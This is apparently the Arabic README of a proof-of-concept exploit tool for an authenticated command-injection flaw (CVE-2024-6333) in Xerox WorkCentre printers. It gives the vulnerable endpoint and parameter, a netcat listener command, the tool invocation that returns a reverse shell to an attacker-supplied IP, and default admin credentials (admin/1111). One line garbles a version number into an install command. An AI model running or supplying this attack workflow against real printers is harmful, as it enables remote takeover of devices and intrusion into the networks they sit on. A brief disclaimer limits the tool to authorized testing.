
ثغرة تنفيذ تعليمات برمجية عن بُعد تتطلب مصادقة في طابعات Xerox WorkCentre عبر ميزة سجل استكشاف أخطاء الشبكة وإصلاحها.
ثغرة تنفيذ التعليمات البرمجية عن بُعد بعد المصادقة في طابعات Xerox WorkCentre عبر ميزة سجل استكشاف أخطاء الشبكة.
وظيفة سجل استكشاف أخطاء الشبكة (/properties/security/network_troubleshooting_log.php) تفشل في تعقيم معلمة خادم الوجهة (security.nwtroubleshoot.destination.server)، مما يسمح لمسؤول مصادق بحقن أوامر نظام تشغيل تعسفية. عند بدء التقاط سجل الشبكة، يتم تنفيذ الحمولة المحقونة كأمر شل، مما يؤدي إلى تنفيذ التعليمات البرمجية عن بُعد.
073.110.019.14200)pip install -r requirements.txt
شغّل مستمعًا على جهازك:
nc -lvnp 8443
شغّل الأداة:
python3 CVE-2024-6333.py --target https://<PRINTER_IP> --lhost <YOUR_IP> --lport 8443
| الوسيط | مطلوب | الافتراضي | الوصف |
|---|---|---|---|
--target | نعم | رابط الهدف (مثل: https://192.0.2.1) | |
--lhost | نعم | عنوان IP للمستمع | |
--lport | لا | 8443 | منفذ المستمع |
--user | لا | admin | اسم مستخدم الإدارة |
--password | لا | 1111 | كلمة مرور الإدارة |
--proxy | لا | رابط البروكسي (مثل: http://127.0.0.1:8080) |
تم توفير هذه الأداة لأغراض اختبار الأمان المصرح به والتعليم فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني.